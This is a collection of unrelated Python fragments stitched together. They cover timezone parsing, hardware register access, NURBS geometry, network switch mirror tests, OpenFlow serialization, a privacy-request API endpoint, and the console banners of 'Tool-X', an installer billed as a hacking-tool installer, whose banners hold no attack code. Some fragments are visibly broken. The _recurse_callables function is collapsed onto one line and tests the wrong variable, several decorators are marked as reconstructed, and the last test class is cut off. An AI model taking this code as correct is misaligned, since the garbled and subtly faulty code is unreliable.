    ``tz`` may be: an int (already an offset), a str (delegated to
    validateTimeZone), or an (abbreviation, extra) pair where ``extra`` is
    None/'' (use the abbreviation's base offset), a short hour count like
    '+2', or an '+hhmm' / '+hh:mm' string added to the base offset.
    ``dt`` is accepted for interface compatibility but unused here.
    """
    if isinstance(tz, int):
        return tz
    if isinstance(tz, str):
        return validateTimeZone(tz)
    abbr, extra = tz
    base = TZ_ABBR_OFFS[abbr]
    if extra is None or extra == '':
        return base
    if len(extra) <= 3:
        # Short form, whole hours: e.g. '+2'.
        return base + int(extra) * 60
    sign = -1 if extra[0] == '-' else 1
    if extra[3] != ':':
        # '+hhmm'
        return base + sign * (int(extra[1:3]) * 60 + int(extra[3:5]))
    # '+hh:mm'
    return base + sign * (int(extra[1:3]) * 60 + int(extra[4:6]))
def read_user_pattern(wb, offset, length, pattern=None):
    """Read ``length`` 32-bit words from main RAM starting at word
    ``offset`` and print each value; when ``pattern`` is given, also
    report whether each word matches it.
    """
    base = wb.mems.main_ram.base
    for index in range(length):
        word = wb.read(base + 4 * (offset + index))
        if pattern is None:
            print('0x{:08x}'.format(word))
        else:
            outcome = 'CORRECT' if word == pattern else 'INCORRECT'
            print('{} --> 0x{:08x}, 0x{:08x}'.format(outcome, word, pattern))
class NURBS():
    """NURBS-based geometry generator (nutils).

    NOTE(review): the ``@`` matrix-multiply operators below were lost in
    extraction ('bsplinebasis controlweights' is invalid syntax) and have
    been reconstructed; a class decorator (e.g. dataclass) may also have
    been stripped — confirm against upstream.
    """

    # Number of uniform refinement passes applied to the base topology.
    nrefine: int = 2

    def generate(self, radius):
        """Build the NURBS patch for the given outer ``radius``.

        Returns (topology with named boundaries hole/sym/far, geometry,
        NURBS basis, 5).
        """
        topo, geom0 = mesh.rectilinear([1, 2])
        bsplinebasis = topo.basis('spline', degree=2)
        controlweights = numpy.ones(12)
        # Weights for the circular-arc control points.
        controlweights[1:3] = 0.5 + 0.25 * numpy.sqrt(2)
        weightfunc = bsplinebasis @ controlweights
        nurbsbasis = (bsplinebasis * controlweights) / weightfunc
        A = (0, 0, 0)
        B = (((2 ** 0.5) - 1) * radius, (0.3 * (radius + 1)) / 2, 1)
        C = (radius, (radius + 1) / 2, 1)
        controlpoints = numpy.array([[A, B, C, C], [C, C, B, A]]).T.reshape(-1, 2)
        geom = nurbsbasis @ controlpoints
        if self.nrefine:
            # Refine, then refit the weight function on the finer basis so
            # the NURBS basis stays consistent.
            topo = topo.refine(self.nrefine)
            bsplinebasis = topo.basis('spline', degree=2)
            sqr = topo.integral((function.dotarg('w', bsplinebasis) - weightfunc) ** 2, degree=9)
            controlweights = solver.optimize('w', sqr)
            nurbsbasis = (bsplinebasis * controlweights) / weightfunc
        return (topo.withboundary(hole='left', sym='top,bottom', far='right'), geom, nurbsbasis, 5)
def start():
    """Program entry point: parse options, optionally self-update, then run
    either in the foreground or as a forked POSIX daemon."""
    opt = parse_opt()
    xeH = xeHentai()
    if (opt.auto_update != 'off'):
        check_update(xeH.logger, {'auto_update': opt.auto_update, 'update_beta_channel': opt.update_beta_channel})
    if opt.daemon:
        if opt.interactive:
            # Interactive mode is meaningless for a daemon; warn and ignore.
            xeH.logger.warning(i18n.XEH_OPT_IGNORING_I)
        if (os.name == 'posix'):
            pid = os.fork()
            if (pid == 0):
                # Child process: detach from the terminal and run the program.
                sys.stdin.close()
                sys.stdout = open('/dev/null', 'w')
                sys.stderr = open('/dev/null', 'w')
                return main(xeH, opt)
        elif (os.name == 'nt'):
            # No fork() on Windows: daemon mode unsupported.
            return xeH.logger.error((i18n.XEH_PLATFORM_NO_DAEMON % os.name))
        else:
            return xeH.logger.error((i18n.XEH_PLATFORM_NO_DAEMON % os.name))
        # Parent process (pid != 0): report the daemon's pid and exit.
        xeH.logger.info((i18n.XEH_DAEMON_START % pid))
    else:
        main(xeH, opt)
class MarkdownSettings(BaseModel):
    """Pydantic model of Markdown template strings keyed by document section.

    NOTE(review): fields appear to be README section/badge templates loaded
    from configuration — confirm the template source and field semantics.
    """

    align: str
    badges_offline: str
    badges_shields: str
    badges_skills: str
    badges_style: str
    contribute: str
    default: str
    features: str
    getting_started: str
    header: str
    header_left: str
    image: str
    modules: str
    modules_widget: str
    overview: str
    slogan: str
    tables: str
    toc: str
    tree: str
class FaucetUntaggedMirrorTest(FaucetUntaggedTest):
    """Faucet integration test: dynamically enable mirroring of port 1 onto
    output-only port 3, verify mirrored traffic and throughput, then
    disable mirroring and re-verify throughput.

    NOTE(review): the embedded YAML config strings below look like their
    indentation was collapsed during extraction — confirm against the
    original before relying on them.
    """

    CONFIG_GLOBAL = '\nvlans:\n 100:\n description: "untagged"\n'
    CONFIG = '\n interfaces:\n %(port_1)d:\n native_vlan: 100\n %(port_2)d:\n native_vlan: 100\n %(port_3)d:\n output_only: True\n %(port_4)d:\n native_vlan: 100\n'

    def test_untagged(self):
        (first_host, second_host, mirror_host) = self.hosts_name_ordered()[0:3]
        first_host_ip = ipaddress.ip_address(first_host.IP())
        second_host_ip = ipaddress.ip_address(second_host.IP())
        self.flap_all_switch_ports()
        # Turn on mirroring of port 1 to port 3 via a live config change
        # (warm start expected: cold_start=False).
        self.change_port_config(self.port_map['port_3'], 'mirror', self.port_map['port_1'], restart=True, cold_start=False)
        self.verify_ping_mirrored(first_host, second_host, mirror_host)
        self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
        # Throughput must still meet the minimum while mirroring is active.
        self.verify_iperf_min(((first_host, self.port_map['port_1']), (second_host, self.port_map['port_2'])), MIN_MBPS, first_host_ip, second_host_ip, sync_counters_func=(lambda : self.one_ipv4_ping(first_host, second_host_ip)))
        # Remove the mirror and verify throughput again.
        self.change_port_config(self.port_map['port_3'], 'mirror', [], restart=True, cold_start=False)
        self.verify_iperf_min(((first_host, self.port_map['port_1']), (second_host, self.port_map['port_2'])), MIN_MBPS, first_host_ip, second_host_ip, sync_counters_func=(lambda : self.one_ipv4_ping(first_host, second_host_ip)))
class FileTreeNode():
    """Node of a (possibly virtual) file tree.

    Children are keyed by ``(name, virtual)`` so a real file and a virtual
    entry sharing a name can coexist; adding a duplicate child merges its
    subtree instead of replacing it.
    """

    def __init__(self, uid, root_uid=None, virtual=False, name=None, size=None, mime_type=None, has_children=False, not_analyzed=False):
        self.uid = uid
        self.root_uid = root_uid
        self.virtual = virtual
        self.name = name
        self.size = size
        self.type = mime_type
        self.has_children = has_children
        self.not_analyzed = not_analyzed
        self.children = {}

    def __str__(self):
        return f"Node '{self.name}' with children {self.get_names_of_children()}"

    def __repr__(self):
        return str(self)

    def __eq__(self, other):
        # Identity is (uid, name, virtual); other attributes don't count.
        return (self.uid, self.name, self.virtual) == (other.uid, other.name, other.virtual)

    def __contains__(self, item):
        return item.get_id() in self.children

    def print_tree(self, spacer=''):
        """Log this subtree, one indented line per node."""
        logging.info(f'{spacer}{self.name} (virtual:{self.virtual}, has_children:{self.has_children})')
        for child_node in self.children.values():
            child_node.print_tree(spacer=spacer + '\t|')

    def merge_node(self, node: 'FileTreeNode'):
        """Fold node's children into the already-present child with the
        same id, recursing on further duplicates."""
        existing = self.children[node.get_id()]
        for child in node.get_list_of_child_nodes():
            if child in existing:
                existing.merge_node(child)
            else:
                existing.add_child_node(child)

    def add_child_node(self, node: 'FileTreeNode'):
        """Attach a child, merging subtrees when the id already exists."""
        if node in self:
            self.merge_node(node)
        else:
            self.has_children = True
            self.children[node.get_id()] = node

    def get_names_of_children(self) -> 'list[str]':
        return [child.name for child in self.children.values()]

    def get_list_of_child_nodes(self) -> 'list[FileTreeNode]':
        return list(self.children.values())

    def get_id(self) -> 'tuple[str, bool]':
        return (self.name, self.virtual)
# NOTE(review): route decorator reconstructed — the bare
# `(PRIVACY_REQUEST_APPROVE, status_code=..., response_model=...)` remnant
# is invalid syntax; confirm the router method (patch) against upstream.
@router.patch(PRIVACY_REQUEST_APPROVE, status_code=HTTP_200_OK, response_model=BulkReviewResponse)
def approve_privacy_request(*, db: Session = Depends(deps.get_db), config_proxy: ConfigProxy = Depends(deps.get_config_proxy), client: ClientDetail = Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_REVIEW]), privacy_requests: ReviewPrivacyRequestIds) -> BulkReviewResponse:
    """Approve a batch of privacy requests: stamp reviewer metadata, write
    an audit-log entry, optionally notify the requester, and queue each
    request for processing."""
    user_id = client.user_id

    def _approve_request(privacy_request: PrivacyRequest) -> None:
        # Applied per request by review_privacy_request.
        now = datetime.utcnow()
        privacy_request.status = PrivacyRequestStatus.approved
        privacy_request.reviewed_at = now
        privacy_request.reviewed_by = user_id
        if privacy_request.custom_fields:
            privacy_request.custom_privacy_request_fields_approved_at = now
            privacy_request.custom_privacy_request_fields_approved_by = user_id
        privacy_request.save(db=db)
        AuditLog.create(db=db, data={'user_id': user_id, 'privacy_request_id': privacy_request.id, 'action': AuditLogAction.approved, 'message': ''})
        if config_proxy.notifications.send_request_review_notification:
            _send_privacy_request_review_message_to_user(action_type=MessagingActionType.PRIVACY_REQUEST_REVIEW_APPROVE, identity_data=privacy_request.get_cached_identity_data(), rejection_reason=None, service_type=config_proxy.notifications.notification_service_type)
        queue_privacy_request(privacy_request_id=privacy_request.id)

    return review_privacy_request(db=db, request_ids=privacy_requests.request_ids, process_request_function=_approve_request)
# NOTE(review): decorator prefix reconstructed — the source remnant
# `.parametrize(...)` is not valid syntax on its own.
@pytest.mark.parametrize(['sql', 'expected'], [('EXEC AdventureWorks2022.dbo.uspGetEmployeeManagers 50;', 'EXECUTE AdventureWorks2022.dbo.uspGetEmployeeManagers'), ('EXECUTE sp_who2', 'EXECUTE sp_who2'), ("EXEC sp_updatestats _schemas = 'true'", 'EXECUTE sp_updatestats'), ('CALL get_car_stats_by_year(2017, , , , );', 'CALL get_car_stats_by_year()'), ('CALL get_car_stats_by_year', 'CALL get_car_stats_by_year()'), ('CALL get_car_stats_by_year;', 'CALL get_car_stats_by_year()'), ('CALL get_car_stats_by_year();', 'CALL get_car_stats_by_year()')])
def test_extract_signature_for_procedure_call(sql, expected):
    """extract_signature normalizes EXEC/CALL statements to a canonical
    procedure-call signature, stripping arguments."""
    actual = extract_signature(sql)
    assert actual == expected
class LiteEthPHYMDIO(LiteXModule):
    """CSR-driven bit-bang controller for the PHY's MDIO management bus.

    Software toggles MDC and drives/releases MDIO through the write CSR;
    the MDIO input is sampled through a synchronizer into the read CSR.
    """

    def __init__(self, pads):
        # Write CSR bits: [0]=mdc clock, [1]=output enable, [2]=data out.
        self._w = CSRStorage(fields=[CSRField('mdc', size=1), CSRField('oe', size=1), CSRField('w', size=1)], name='w')
        # Read CSR bit: [0]=sampled mdio input.
        self._r = CSRStatus(fields=[CSRField('r', size=1)], name='r')
        data_w = Signal()
        data_oe = Signal()
        data_r = Signal()
        self.comb += [pads.mdc.eq(self._w.storage[0]), data_oe.eq(self._w.storage[1]), data_w.eq(self._w.storage[2])]
        # Synchronize the asynchronous MDIO input into the local clock domain.
        self.specials += MultiReg(data_r, self._r.status[0])
        # MDIO is bidirectional: drive data_w when data_oe, else sample data_r.
        self.specials += Tristate(pads.mdio, data_w, data_oe, data_r)
# NOTE(review): decorator prefix reconstructed — the source remnant
# `.parametrize(...)` is not valid syntax on its own.
@pytest.mark.parametrize('transform', ['INIT_TRANSFORM', 'OUTPUT_TRANSFORM'])
def test_unknown_transform_functions_raises_a_config_error(parse_field_line, transform):
    """An unknown transform function name in a FIELD line must raise a
    ConfigValidationError naming the offending transform."""
    with pytest.raises(expected_exception=ConfigValidationError, match=f'Line 3.*FIELD {transform}:silly is an invalid function'):
        _ = parse_field_line(f'FIELD F PARAMETER f.grdecl INIT_FILES:f%d.grdecl {transform}:silly')
class port_desc(loxi.OFObject):
    """OpenFlow port description structure (LOXI-generated style).

    NOTE(review): serialization joins str padding with struct.pack output,
    so this reads as Python 2 byte-string code — confirm before porting.
    """

    def __init__(self, port_no=None, hw_addr=None, name=None, config=None, state=None, curr=None, advertised=None, supported=None, peer=None):
        if (port_no != None):
            self.port_no = port_no
        else:
            self.port_no = 0
        if (hw_addr != None):
            self.hw_addr = hw_addr
        else:
            self.hw_addr = [0, 0, 0, 0, 0, 0]
        if (name != None):
            self.name = name
        else:
            self.name = ''
        if (config != None):
            self.config = config
        else:
            self.config = 0
        if (state != None):
            self.state = state
        else:
            self.state = 0
        if (curr != None):
            self.curr = curr
        else:
            self.curr = 0
        if (advertised != None):
            self.advertised = advertised
        else:
            self.advertised = 0
        if (supported != None):
            self.supported = supported
        else:
            self.supported = 0
        if (peer != None):
            self.peer = peer
        else:
            self.peer = 0
        return

    def pack(self):
        """Serialize to wire format."""
        packed = []
        packed.append(util.pack_port_no(self.port_no))
        packed.append(struct.pack('!6B', *self.hw_addr))
        packed.append(struct.pack('!16s', self.name))
        packed.append(struct.pack('!L', self.config))
        packed.append(struct.pack('!L', self.state))
        packed.append(struct.pack('!L', self.curr))
        packed.append(struct.pack('!L', self.advertised))
        packed.append(struct.pack('!L', self.supported))
        packed.append(struct.pack('!L', self.peer))
        return ''.join(packed)

    # Fixed: restored @staticmethod — unpack takes no self and builds a
    # fresh object, matching the LOXI generated-code convention.
    @staticmethod
    def unpack(reader):
        """Deserialize from wire format."""
        obj = port_desc()
        obj.port_no = util.unpack_port_no(reader)
        obj.hw_addr = list(reader.read('!6B'))
        obj.name = reader.read('!16s')[0].rstrip('\x00')
        obj.config = reader.read('!L')[0]
        obj.state = reader.read('!L')[0]
        obj.curr = reader.read('!L')[0]
        obj.advertised = reader.read('!L')[0]
        obj.supported = reader.read('!L')[0]
        obj.peer = reader.read('!L')[0]
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.port_no != other.port_no):
            return False
        if (self.hw_addr != other.hw_addr):
            return False
        if (self.name != other.name):
            return False
        if (self.config != other.config):
            return False
        if (self.state != other.state):
            return False
        if (self.curr != other.curr):
            return False
        if (self.advertised != other.advertised):
            return False
        if (self.supported != other.supported):
            return False
        if (self.peer != other.peer):
            return False
        return True

    def pretty_print(self, q):
        """Write a human-readable dump of the port description to q."""
        q.text('port_desc {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('port_no = ')
                q.text(util.pretty_port(self.port_no))
                q.text(',')
                q.breakable()
                q.text('hw_addr = ')
                q.text(util.pretty_mac(self.hw_addr))
                q.text(',')
                q.breakable()
                q.text('name = ')
                q.pp(self.name)
                q.text(',')
                q.breakable()
                q.text('config = ')
                # Fixed: the OFPPC_BSN_MIRROR_DEST key (1 << 31) was missing
                # in the source, which is a syntax error; restored.
                value_name_map = {1: 'OFPPC_PORT_DOWN', 2: 'OFPPC_NO_STP', 4: 'OFPPC_NO_RECV', 8: 'OFPPC_NO_RECV_STP', 16: 'OFPPC_NO_FLOOD', 32: 'OFPPC_NO_FWD', 64: 'OFPPC_NO_PACKET_IN', 2147483648: 'OFPPC_BSN_MIRROR_DEST'}
                q.text(util.pretty_flags(self.config, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('state = ')
                value_name_map = {1: 'OFPPS_LINK_DOWN', 0: 'OFPPS_STP_LISTEN', 256: 'OFPPS_STP_LEARN', 512: 'OFPPS_STP_FORWARD', 768: 'OFPPS_STP_MASK'}
                q.text(util.pretty_flags(self.state, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('curr = ')
                value_name_map = {1: 'OFPPF_10MB_HD', 2: 'OFPPF_10MB_FD', 4: 'OFPPF_100MB_HD', 8: 'OFPPF_100MB_FD', 16: 'OFPPF_1GB_HD', 32: 'OFPPF_1GB_FD', 64: 'OFPPF_10GB_FD', 128: 'OFPPF_COPPER', 256: 'OFPPF_FIBER', 512: 'OFPPF_AUTONEG', 1024: 'OFPPF_PAUSE', 2048: 'OFPPF_PAUSE_ASYM'}
                q.text(util.pretty_flags(self.curr, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('advertised = ')
                value_name_map = {1: 'OFPPF_10MB_HD', 2: 'OFPPF_10MB_FD', 4: 'OFPPF_100MB_HD', 8: 'OFPPF_100MB_FD', 16: 'OFPPF_1GB_HD', 32: 'OFPPF_1GB_FD', 64: 'OFPPF_10GB_FD', 128: 'OFPPF_COPPER', 256: 'OFPPF_FIBER', 512: 'OFPPF_AUTONEG', 1024: 'OFPPF_PAUSE', 2048: 'OFPPF_PAUSE_ASYM'}
                q.text(util.pretty_flags(self.advertised, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('supported = ')
                value_name_map = {1: 'OFPPF_10MB_HD', 2: 'OFPPF_10MB_FD', 4: 'OFPPF_100MB_HD', 8: 'OFPPF_100MB_FD', 16: 'OFPPF_1GB_HD', 32: 'OFPPF_1GB_FD', 64: 'OFPPF_10GB_FD', 128: 'OFPPF_COPPER', 256: 'OFPPF_FIBER', 512: 'OFPPF_AUTONEG', 1024: 'OFPPF_PAUSE', 2048: 'OFPPF_PAUSE_ASYM'}
                q.text(util.pretty_flags(self.supported, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('peer = ')
                value_name_map = {1: 'OFPPF_10MB_HD', 2: 'OFPPF_10MB_FD', 4: 'OFPPF_100MB_HD', 8: 'OFPPF_100MB_FD', 16: 'OFPPF_1GB_HD', 32: 'OFPPF_1GB_FD', 64: 'OFPPF_10GB_FD', 128: 'OFPPF_COPPER', 256: 'OFPPF_FIBER', 512: 'OFPPF_AUTONEG', 1024: 'OFPPF_PAUSE', 2048: 'OFPPF_PAUSE_ASYM'}
                q.text(util.pretty_flags(self.peer, value_name_map.values()))
            q.breakable()
        q.text('}')
class SFNTReaderTest:
    """Tests that SFNTReader instances survive deepcopy / pickle round-trips.

    Bug fixed: both decorators had been mangled to bare ``.parametrize(...)``
    (a syntax error). Restored as ``@pytest.mark.parametrize``, which matches
    the parametrized ``deepcopy`` argument and the ``tmp_path`` pytest
    fixture used below — NOTE(review): confirm against version control.
    """

    @pytest.mark.parametrize('deepcopy', [copy.deepcopy, pickle_unpickle])
    def test_pickle_protocol_FileIO(self, deepcopy, tmp_path):
        """A reader backed by a real file must copy to an equivalent FileIO reader."""
        fontfile = (tmp_path / 'test.ttf')
        fontfile.write_bytes(EMPTY_SFNT)
        reader = SFNTReader(fontfile.open('rb'))
        reader2 = deepcopy(reader)
        # The copy must be a distinct object with a distinct (but equivalent) file.
        assert (reader2 is not reader)
        assert (reader2.file is not reader.file)
        assert isinstance(reader2.file, io.BufferedReader)
        assert isinstance(reader2.file.raw, io.FileIO)
        assert (reader2.file.name == reader.file.name)
        assert (reader2.file.tell() == reader.file.tell())
        # All non-file attributes must compare equal after the round-trip.
        for (k, v) in reader.__dict__.items():
            if (k == 'file'):
                continue
            assert (getattr(reader2, k) == v)

    @pytest.mark.parametrize('deepcopy', [copy.deepcopy, pickle_unpickle])
    def test_pickle_protocol_BytesIO(self, deepcopy, tmp_path):
        """A reader backed by an in-memory buffer must copy to an equivalent BytesIO reader."""
        buf = io.BytesIO(EMPTY_SFNT)
        reader = SFNTReader(buf)
        reader2 = deepcopy(reader)
        assert (reader2 is not reader)
        assert (reader2.file is not reader.file)
        assert isinstance(reader2.file, io.BytesIO)
        assert (reader2.file.tell() == reader.file.tell())
        # The buffer contents must be carried over byte-for-byte.
        assert (reader2.file.getvalue() == reader.file.getvalue())
        for (k, v) in reader.__dict__.items():
            if (k == 'file'):
                continue
            assert (getattr(reader2, k) == v)
class logo():
    """Console UI banners and status screens for the Tool-X installer.

    All methods only print colored text; the color codes ({yellow}, {green},
    {cyan}, {red}, {purple}, {violate}, {nc}) are module-level globals defined
    elsewhere in the file — presumably ANSI escape sequences; TODO confirm.
    NOTE(review): the banner strings appear whitespace-collapsed in this copy
    of the file; they are reproduced verbatim, not reformatted.
    """

    def tool_header(self):
        # Top banner with the Tool-X ASCII art and version tag.
        print(f''' {yellow} _____ _ __ __ |_ _|__ ___ | | \ \/ / | |/ _ \ / _ \| |____\ / | | (_) | (_) | |____/ \ |_|\___/ \___/|_| /_/\_\ {purple}v2.1 {cyan} {yellow}| Install Best Hacking Tool | {cyan} {nc}''')

    def tool_footer(self):
        # Horizontal rule printed under every screen.
        print(f'''{cyan}_______________________________________________ {nc}''')

    def not_ins(self):
        # Shown when installing Tool-X itself failed.
        self.tool_header()
        print(f''' {cyan} [ + ] {red}We can't install Tool-X. {cyan} [ + ] {red}There are some error. {cyan} [ + ] {red}Please try again after some time!''')
        self.tool_footer()

    def ins_tnc(self):
        # Terms-and-conditions / disclaimer screen shown before install.
        self.tool_header()
        print(f''' {yellow} [ + ] {green}Use It At Your Own Risk. {yellow} [ + ] {green}No Warranty. {yellow} [ + ] {green}Use it legal purpose only. {yellow} [ + ] {green}We are not responsible for your actions. {yellow} [ + ] {green}Do not do things that are forbidden. {red} If you are installing this tool. that means you are agree with all terms.''')
        self.tool_footer()

    def ins_sc(self):
        # Success screen after Tool-X itself was installed.
        self.tool_header()
        print(f''' {yellow} [ + ] {green}Tool-X installed successfully. {yellow} [ + ] {green}To run Tool-X, {yellow} [ + ] {green}Type Tool-X in your terminal.''')
        self.tool_footer()

    def update(self):
        # Update sub-menu (1 = update, 0 = back).
        self.tool_header()
        print(f''' {yellow} [ 1 ] {green}Update your Tool-X. {yellow} [ 0 ] {green}For Back.{nc}''')
        self.tool_footer()

    def updated(self):
        # Confirmation screen after a successful self-update.
        self.tool_header()
        print(f''' {yellow} [ + ] {green}Tool-X Updated Successfully. {yellow} [ + ] {green}Press Enter to continue.{nc}''')
        self.tool_footer()

    def nonet(self):
        # Shown when no network connection is available.
        self.tool_header()
        print(f''' {cyan} [ + ] {red}No network connection? {cyan} [ + ] {red}Are you offline? {cyan} [ + ] {red}Please try again after some time.{nc}''')
        self.tool_footer()

    def update_error(self):
        # Shown when the self-update failed.
        self.tool_header()
        print(f''' {red} [ + ] {red}We can't Update Tool-X. 
{red} [ + ] {red}Please try again after some time.{nc}''')
        self.tool_footer()

    def about(self, total):
        # About screen; `total` is the number of installable tools.
        self.tool_header()
        print(f''' {yellow} [+] Tool Name :- {green}Tool-X {yellow} [+] Latest Update :- {green}23/3/2019. {yellow} [+] Tools :- {green}total {total} tools. {yellow} [+] {green}Tool-x is automatic tool installer. {yellow} [+] {green}Made for termux and linux based system. {red} [+] Note :- Use this tool at your own risk.''')
        self.tool_footer()

    def install_tools(self):
        # Header shown above the tool-selection list.
        print(f'''{yellow} {green}|_____________ Select your tool ______________| {yellow}{nc}''')

    def already_installed(self, name):
        # Shown when the selected tool `name` is already present.
        self.tool_header()
        print(f''' {yellow} [ + ] {green}Sorry ?? {yellow} [ + ] {violate}'{name}'{green} is already Installed !! ''')
        self.tool_footer()

    def installed(self, name):
        # Shown after tool `name` installed successfully.
        self.tool_header()
        print(f''' {yellow} [ + ] {green}Installed Successfully !! {yellow} [ + ] {violate}'{name}'{green} is Installed Successfully !! ''')
        self.tool_footer()

    def not_installed(self, name):
        # Shown when installing tool `name` failed.
        self.tool_header()
        print(f''' {yellow} [ + ] {red}Sorry ?? {yellow} [ + ] {violate}'{name}'{red} is not installed !! ''')
        self.tool_footer()

    def back(self):
        # "00) Back" navigation hint.
        print(f''' {yellow}| 00) Back | {nc}''')

    def updating(self):
        # Progress banner while Tool-X updates itself.
        print(f'''{yellow} {green}|______________ Updating Tool-X ______________| {yellow}{nc}''')

    def installing(self):
        # Progress banner while a tool is being installed.
        print(f'''{yellow} {green}|________________ Installing _________________| {yellow}{nc}''')

    def menu(self, total):
        # Main menu; `total` is the number of available tools.
        self.tool_header()
        print(f''' {yellow} [ 1 ] {green}Show all tools.{yellow} [ {purple}{total} tools{yellow} ] {yellow} [ 2 ] {green}Tools Category. {yellow} [ 3 ] {green}Update Tool-X. {yellow} [ 4 ] {green}About Us. {yellow} [ x ] {green}For Exit.''')
        self.tool_footer()

    def exit(self):
        # Goodbye screen printed on exit.
        self.tool_header()
        print(f''' {yellow} [ + ] {green}Thanks for using Tool-X {yellow} [ + ] {green}Good Bye.....! ){nc}''')
        self.tool_footer()
def filter_ips_decoder_data(json):
    """Filter an IPS decoder payload down to its supported fields.

    The payload is first passed through remove_invalid_fields(); only the
    'name' and 'parameter' keys whose values are not None are kept.
    """
    json = remove_invalid_fields(json)
    return {field: json[field]
            for field in ('name', 'parameter')
            if field in json and json[field] is not None}
def test_feed_forward_convolution_block():
    """Forward a batch through a VGG-style convolution block and check output shapes."""
    batch = build_input_dict(dims=[100, 3, 64, 64])
    block: VGGConvolutionBlock = VGGConvolutionBlock(
        in_keys='in_key', out_keys='out_key', in_shapes=(3, 64, 64),
        hidden_channels=[4, 8, 16], non_lin=nn.ReLU)
    # The string representation must not raise.
    str(block)
    result = block(batch)
    assert isinstance(result, Dict)
    assert set(block.out_keys).issubset(set(result.keys()))
    assert block.output_channels == 16
    out_tensor = result[block.out_keys[0]]
    # Channel dimension matches the last hidden layer; spatial dims are pooled to 8x8.
    assert out_tensor.shape[-3] == block.output_channels
    assert out_tensor.shape == (100, 16, 8, 8)
    assert block.out_shapes() == [out_tensor.shape[-3:]]
def test():
    """Check the learner's solution: blank French model, DocBin, saved to disk."""
    # (required code snippet, hint shown on failure)
    expected = [
        ('spacy.blank("fr")', 'As-tu cree le modele francais vierge ?'),
        ('DocBin(docs=docs)', "As-tu cree correctement l'objet DocBin ?"),
        ('doc_bin.to_disk(', 'As-tu utilise la methode to_disk?'),
        ('train.spacy', 'As-tu bien nomme le fichier correctement ?'),
    ]
    for snippet, hint in expected:
        assert snippet in __solution__, hint
    __msg__.good('Bien joue ! Maintenant nous pouvons entrainer le modele.')
class StatsdMixin(metaclass=abc.ABCMeta):
    """Mixin that lazily provides a StatsD client for metric reporting.

    Subclasses supply ``statsd_prefix``; the client is created on first use
    of ``mon_con`` and cached for the lifetime of the instance.
    """

    # NOTE(review): the empty body plus the attribute-style use below
    # (`prefix=self.statsd_prefix`, no call) strongly suggest this was an
    # @property + @abc.abstractmethod pair whose decorators were lost when the
    # file was collapsed — confirm against version control. As written,
    # StatsClient would receive the bound method object, not a prefix string.
    def statsd_prefix(self):
        pass

    # NOTE(review): likewise reads like a lost @property (lazy cached accessor).
    def mon_con(self):
        # Build the client on first access; host comes from project config,
        # 8125 is the conventional StatsD UDP port.
        if (self.__mon_con is None):
            self.__mon_con = statsd.StatsClient(host=config.C_GRAPHITE_DB_IP, port=8125, prefix=self.statsd_prefix)
        return self.__mon_con

    def __init__(self, *args, **kwargs):
        # Cooperative __init__ so the mixin composes with other bases.
        super().__init__(*args, **kwargs)
        self.__mon_con = None  # cached StatsClient, created lazily by mon_con
def navigate_trace_frames(session: Session, initial_trace_frames: List[TraceFrameQueryResult], sources: Set[str], sinks: Set[str], index: int=0) -> List[Tuple[(TraceFrameQueryResult, int)]]:
    """Follow a trace from ``initial_trace_frames[index]`` down to a leaf frame.

    At every step the first candidate successor is taken greedily. Returns a
    list of ``(frame, branch_count)`` pairs, where ``branch_count`` records how
    many alternatives were available at that step. If a non-leaf frame has no
    successors, a synthetic zero-id frame echoing the callee is appended so
    callers can see where the trace dead-ends.
    """
    leaf_lookup = LeafLookup.create(session)
    if (not initial_trace_frames):
        return []
    # Seed with the chosen starting frame and its sibling count.
    trace_frames = [(initial_trace_frames[index], len(initial_trace_frames))]
    # Ids already visited — passed to next_frames to avoid cycles.
    visited_ids: Set[int] = {int(initial_trace_frames[index].id)}
    while (not trace_frames[(- 1)][0].is_leaf()):
        (trace_frame, branches) = trace_frames[(- 1)]
        # Postconditions terminate at sources; preconditions at sinks.
        if (trace_frame.kind == TraceKind.POSTCONDITION):
            leaf_kind = sources
        elif (trace_frame.kind == TraceKind.PRECONDITION):
            leaf_kind = sinks
        else:
            # Unreachable guard: only the two kinds above are expected here,
            # so this assert always fails if a new kind slips through.
            assert ((trace_frame.kind == TraceKind.POSTCONDITION) or (trace_frame.kind == TraceKind.PRECONDITION))
        next_nodes = next_frames(session, trace_frame, leaf_kind, visited_ids, leaf_lookup=leaf_lookup)
        if (len(next_nodes) == 0):
            # Dead end: append a placeholder (id 0) carrying the callee info,
            # then stop the traversal.
            trace_frames.append((TraceFrameQueryResult(id=DBID(0), callee=trace_frame.callee, callee_port=trace_frame.callee_port, caller='', caller_port=''), 0))
            return trace_frames
        # Greedily descend into the first candidate successor.
        visited_ids.add(int(next_nodes[0].id))
        trace_frames.append((next_nodes[0], len(next_nodes)))
    return trace_frames
def _recurse_callables(val: _T, fnc: Callable, check_type: Type=str): if isinstance(val, (list, List, tuple, Tuple)): out = [] for v in val: if isinstance(val, (list, List, tuple, Tuple, dict, Dict)): out.append(_recurse_callables(v, fnc, check_type)) else: out.append(fnc(v)) out = type(val)(out) elif isinstance(val, (dict, Dict)): out = {} for (k, v) in val.items(): if isinstance(val, (list, List, tuple, Tuple, dict, Dict)): out.update({k: _recurse_callables(v, fnc, check_type)}) else: out.update({k: fnc(v)}) elif isinstance(val, check_type): out = fnc(val) else: out = val return out
class TestSOASettings(unittest.TestCase):
    """Tests for pysoa settings schemas: dotted-path resolution and
    client/server transport, serializer and middleware validation."""

    def test_classes_converted(self):
        # 'path' strings must be resolved into the actual classes under 'object'.
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.client:RedisClientTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}, 'middleware': [{'path': 'pysoa.client.middleware:ClientMiddleware'}]}
        settings = SOASettings(settings_dict)
        assert (settings['transport']['object'] == RedisClientTransport)
        assert (settings['middleware'][0]['object'] == ClientMiddleware)

    def test_client_settings(self):
        # A Client built from settings wires up the transport, queue name,
        # core backend type and the configured JSON serializer.
